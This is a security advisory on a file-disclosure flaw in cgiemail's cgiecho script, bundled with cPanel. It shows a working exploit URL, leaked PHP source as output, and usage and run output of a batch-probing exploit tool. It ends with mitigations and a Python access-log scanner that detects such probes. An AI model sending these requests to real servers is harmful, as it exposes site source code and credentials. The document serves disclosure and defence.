cgiecho, a script included with cgiemail, will return any file under a website's document root if the file contains square brackets and the text within the brackets is guessable.
cgiemail currently ships with cPanel and is enabled by default.
<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }
http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
<?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*..*/ }
</PRE><P>
<P><EM>cgiemail
1.6
</EM></BODY>
Usage: ./cgiemail-exploit.pl [options] target
Options:
--names Check for names in commer separated list
--num Check for numbers
--num-max Maximum number to check (default 10)
--php Check PHP $_SERVER Variables
--batch Number of arguments sent per request (default 10)
--cgiecho-path Path of cgiecho on server (default '/cgi-sys/cgiecho/')
--user-agent Set user-agent (default 'Mozilla/5.0')
--deley Pause between requests in seconds (default 1)
--timeout Set connection timeout (default 10)
$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&
- if no value is supplied for a variable it is excluded from the output, so expect to see some '$_POST/$_GET' variables with missing []...
- don't use cgiemail...
- disable cgiemail...
- if for whatever reason you're stuck on a system with cgiemail, the maximum variable length is 255; a long string inside square brackets will return an error.
- don't use square brackets?
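For anyone who cannot remove cgiemail right away, the request shape shown above (a GET to the cgiecho path with bracketed template variables in the query string) is easy to pick out of web server access logs. The following is an added example, not code from the advisory or from cgiemail: a small log scanner that flags cgiecho requests carrying [...] template variables and tallies them per client address. The log lines are constructed for this example in Apache combined format, and the default cgiecho path is the one the advisory names.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format), not taken from
# the advisory. Lines 1, 2 and 4 mimic the cgiecho request shape the advisory
# shows (bracketed template variables in the query string, once with a doubled
# leading slash and once URL-encoded); lines 3 and 5 are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "GET /cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2] HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2017:13:55:37 +0000] "GET /cgi-sys/cgiecho/login.php?'pass'=%5B'pass'%5D HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2017:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2017:13:56:02 +0000] "GET //cgi-sys/cgiecho/login.php?3=[3]&4=[4] HTTP/1.1" 200 501 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2017:13:56:03 +0000] "POST /cgi-sys/cgiemail/contact.txt HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [time], "METHOD target HTTP/x", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A cgiecho template variable is whatever sits between square brackets.
TEMPLATE_VAR_RE = re.compile(r"\[([^\]]*)\]")


def find_cgiecho_template_probes(log_text, cgiecho_path="/cgi-sys/cgiecho/"):
    """Return one finding per request that asks cgiecho to render a file and
    supplies bracketed template variables in the query string."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path, _, query = m.group("target").partition("?")
        # Collapse a doubled leading slash (the advisory's own success URL has one)
        # and decode any percent-encoding before comparing against the cgiecho path.
        path = re.sub(r"^/+", "/", unquote(path))
        if not path.startswith(cgiecho_path) or not query:
            continue
        variables = TEMPLATE_VAR_RE.findall(unquote(query))
        if not variables:
            continue  # cgiecho request without [..] templates; not the pattern of interest
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            # cgiecho takes the file to render as the path after its own name
            "file": path[len(cgiecho_path):],
            "variables": variables,
            "status": int(m.group("status")),
        })
    return findings


def summarize_by_ip(findings):
    """Count flagged requests per client address; bursts from one address
    match the batched probing the advisory's tool output shows."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    hits = find_cgiecho_template_probes(SAMPLE_LOG)
    for h in hits:
        print(f"{h['time']} {h['ip']} file={h['file']} status={h['status']} vars={h['variables']}")
    print("per-IP counts:", summarize_by_ip(hits))
```

Run against a real access log by replacing SAMPLE_LOG with the file contents; a 200 status on a flagged request means cgiecho rendered the named file, which is the condition worth alerting on until cgiemail is disabled.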